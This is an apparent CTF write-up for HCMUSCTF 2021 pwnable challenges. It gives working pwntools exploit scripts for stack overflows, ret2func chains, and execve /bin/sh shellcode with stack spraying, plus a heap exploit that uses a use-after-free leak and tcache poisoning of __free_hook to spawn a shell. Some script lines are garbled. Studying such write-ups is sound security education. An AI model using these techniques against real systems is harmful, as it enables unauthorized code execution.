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Writeup Pwnable
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Qualification #

mybirthday #

The program needs to get the result of this comparison to be 0 to run the shell

cmp DWORD PTR [ebp-0xc],0xcabbfeff

Nothing special in this challenge, just a basic memory modifying, i overflowed the input and overwritten the default var value with 0xcabbfeff. My script:

from pwn import *

#io = process('./hpbd')
io = remote('', 30200)

payload = b'A'*24+p32(0xcabbfeff)

bank1 #

This is just a blind overflow challenge, you send a lot of input and the server will return the flag.

bank2 #

This challenge is not much different from bank1, another memory modifying challenge. My script:

from pwn import *

io = remote('', 30203)
#io = process('./bank2')

print(io.recvuntil(': '))
payload = b'A'*64+p32(0x66a44)

bank3 #

This challenge requires us to overwritten the return address of the function, so the program flow will be redirected to the function which will spawn a shell. Here’s the script:

from pwn import *

#io = process('./bank3')
io = remote('', 30204)

payload = b'A'*80+p32(0x08048506)

print(io.recvuntil(': '))

SecretWeapon #

Another offset calculation challenge, the program first gave us the address of townsquare function, in the binary we already had /bin/sh string and run_cmd function, we just need to calculate the offset between townsquare and those, last step we just need to craft a exploit chain so the /bin/sh will be executed by run_cmd, which should be easy:

from pwn import *

elf = ELF('./weapon')
#io = process('./weapon')
io = remote('', 30201)

base = int(io.recv().split()[-1], 16)
cmd = base -84
bash = base+3337

payload = b'A'*4+b'B'*4+b'C'*4+b'D'*4+b'E'*4+b'F'*4+b'J'*4+p32(cmd)+b'A'*4+p32(bash)

After had finished 5 of those, my python3 gone wrong and got broken, so i couldn’t use pwntools, also i was sleepy, i decided to take a rest and solve the rest challenge later, but when i woke up, a member from my team had already solved bank4 and bank5, so i continued solving bank6, and went back to sleep, again.

bank6 #

Bank6 is a shellcode + stack spraying challenge

First i wrote a basic shellcode as usual, like this:

0:  31 c0                   xor    eax,eax
2:  50                      push   eax
3:  68 2f 2f 73 68          push   0x68732f2f
8:  68 2f 62 69 6e          push   0x6e69622f
d:  89 e3                   mov    ebx,esp
f:  50                      push   eax
10: 53                      push   ebx
11: 89 e1                   mov    ecx,esp
13: b0 0b                   mov    al,0xb
15: cd 80                   int    0x80

But we need to modify the shellcode, because the program use scanf function to get input, which will end the input string when it meets white spaces (the input stopped at 0x0b byte which is a “VT vertical tab”). So i did a few fix and the final shellcode will look like this:

0:  31 c0                   xor    eax,eax
2:  50                      push   eax
3:  68 2f 2f 73 68          push   0x68732f2f
8:  68 2f 62 69 6e          push   0x6e69622f
d:  89 e3                   mov    ebx,esp
f:  50                      push   eax
10: 53                      push   ebx
11: 89 e1                   mov    ecx,esp
13: b0 b0                   mov    al,0xb0
15: 2c a5                   sub    al,0xa5
17: cd 80                   int    0x80

Because the shellcode is 25 bytes long, i appended 3 more \x90 (nop) byte before the shellcode to get stack dword aligned for stack spraying, finally, spray the return address which was leaked in the program: [+] Here is a gift: 0xffa55cac

Here is the final script:

from pwn import *

shellcode = b'\x90'*3+b'\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\xB0\x2C\xA5\xCD\x80'

#io = process('./bank6')
io = remote('', 30207)
stack_addr = int(io.recvline().split()[-1], 16)

payload = shellcode+ 259*p32(stack_addr)


Final #

Book manager [200pts] (HCMUSCTF2021 Final) #


source code


The vulnerability #

After a while i managed to find out 2 vulnerabilities in the binary:

  • The binary duplicate page but does not check the size of page:
idx = get_int_prompt("[+] Which book you want to copy from?: ");
PBook pBook = get_book(idx);
idx = get_int_prompt("[+] Which page you want to copy from?: ");
char* page = get_page(pBook, idx);
char* new_page = strdup(page);
*page_size = pBook->page_size[idx]; // the vulnerability here
return new_page;
  • The print page function allows us to print deallocated memories:
void print_page()
    int idx;
    idx = get_int_prompt("[+] Which book you want to print?: ");
    PBook pBook = get_book(idx);
    idx = get_int_prompt("[+] Which page you want to print?: ");
    if (idx < 0 || idx >= MAX_BOOK_PAGES)
    printf("[+] Content: %s\n", pBook->page[idx]); 
    // read the content in page without checking if the page has been deallocated or not

Exploit #

With the first vulnerability, i was able to overwrite the next heap’s metadata, which led to buffer overflow on the heap:

add(4, 1000, b'A'*4) # add page to book 4: b4->[0]
dup(4, 4, 0) # duplicate page 0 of book 4: b4->[0,1]
add(4, 0x40, b'A') # add target page to book 4: b4->[0,1,2]
add(4, 0x40, b'A') # add dummy page to book 4: b4->[0,1,2,3]
dele(4) # remove page dummy page from book 4
dele(4) # remove page target page from book 4
#crafting payload
pl = b'A'*24+p64(0x51)
pl += p64(libc_start_main - elf.sym['__libc_start_main'] + 0x1eeb28-8)
pl += p64(0) #+p64(heap_base + 0x10) remove hashtag for libc 2.32
edit(4, 1, pl) # overwrite target page's forward pointer with __free_hook address

With the second vulnerability, i was able to leak heap and leak libc through main_arena (unsortedbin):

# leak heap
add(2, 4, b'A') # target
add(2, 4, b'B') # dummy
dele(2) # free dummy
dele(2) # free target
prit(2, 0) # print target's forward pointer
print(io.recvuntil(b'[+] Content: '))
a = io.recv(4)+b'\0\0\0\0'
heap_base = u64(a)- 0x2c0 # calculate the base heap
b = hex(heap_base)'Heap: {b}')
add(2, 4, b'A') # realign heap
add(2, 4, b'B') # realign heap

# leak libc
add(0, 2000, b'AAAA') # target
add(1, 2000, b'BBBB') # dummy to prevent heap collision
dele(0) # free target
prit(0, 0) # print target's <main_arena+96> address
print(io.recvuntil(b'[+] Content: '))
a= io.recv(6)+b'\0\0'
libc_start_main = u64(a)-1854496 # calculate libc_start_main
add(0, 2000, b'AAAA') # realign heap

So from the two vulnerability above, we archived arbitrary write

Exploit Code #

from pwn import *

io = process('./book_manager')
#io = remote('', 30208)
elf = ELF('/lib/x86_64-linux-gnu/')

def add(book_idx, page_size, content):
    print(io.recvuntil(b'> Your choice: '))
    print(io.recvuntil(b'[+] Which book you want to add a new page?: '))
    print(io.recvuntil(b'> '))
    print(io.recvuntil(b'[+] New page size: '))
    print(io.recvuntil(b'[+] Enter new content: '))

def dup(book_idx, book_to_dup_from, page_to_dup_from):
    print(io.recvuntil(b'> Your choice: '))
    print(io.recvuntil(b'[+] Which book you want to add a new page?: '))
    print(io.recvuntil(b'> '))
    print(io.recvuntil(b'[+] Which book you want to copy from?: '))
    print(io.recvuntil(b'[+] Which page you want to copy from?: '))

def prit(book_idx, page_idx):
    print(io.recvuntil(b'> Your choice: '))
    print(io.recvuntil(b'[+] Which book you want to print?: '))
    print(io.recvuntil(b'[+] Which page you want to print?: '))

def edit(book_idx, page_idx, content):
    print(io.recvuntil(b'> Your choice: '))
    print(io.recvuntil(b'[+] Which book you want to edit?: '))
    print(io.recvuntil(b'[+] Which page you want to edit?: '))
    print(io.recvuntil(b'[+] Enter new content: '))

def dele(book_to_delete_page_from):
    print(io.recvuntil(b'> Your choice: '))
    print(io.recvuntil(b'[+] Which book you want to delete page?: '))

# leak heap
add(2, 4, b'A') # target
add(2, 4, b'B') # dummy
dele(2) # free dummy
dele(2) # free target
prit(2, 0) # print target's forward pointer
print(io.recvuntil(b'[+] Content: '))
a = io.recv(4)+b'\0\0\0\0'
heap_base = u64(a)- 0x2c0 # calculate the base heap
b = hex(heap_base)'Heap: {b}')
add(2, 4, b'A') # realign heap
add(2, 4, b'B') # realign heap

# leak libc
add(0, 2000, b'AAAA') # target
add(1, 2000, b'BBBB') # dummy to prevent heap collision
dele(0) # free target
prit(0, 0) # print target's <main_arena+96> address
print(io.recvuntil(b'[+] Content: '))
a= io.recv(6)+b'\0\0'
libc_start_main = u64(a)-1854496 # calculate libc_start_main
add(0, 2000, b'AAAA') # realign hea

add(4, 1000, b'A'*4) # add page to book 4: b4->[0]
dup(4, 4, 0) # duplicate page 0 of book 4: b4->[0,1]
add(4, 0x40, b'A') # add target page to book 4: b4->[0,1,2]
add(4, 0x40, b'A') # add dummy page to book 4: b4->[0,1,2,3]
dele(4) # remove page dummy page from book 4
dele(4) # remove page target page from book 4
#crafting payload
pl = b'A'*24+p64(0x51)
pl += p64(libc_start_main - elf.sym['__libc_start_main'] + 0x1eeb28 - 8) # __free_hook - 8
pl += p64(0) #+p64(heap_base + 0x10) remove hashtag for libc 2.32
edit(4, 1, pl) # overwrite target page's forward pointer with __free_hook address
add(4, 0x40, b'A') # malloc target heap, the next malloc will allocate memory at __free_hook
add(4, 0x40, b"/bin/sh\0" + p64(libc_start_main-elf.sym['__libc_start_main']+elf.sym['system']))
# this step is a trick, you could also overwrite with one_gadget but you can use this trick
# if the one_gadget fails, write /bin/sh\0 to __free_hook - 8 and write system to __free_hook
dele(4) # trigger system call /bin/sh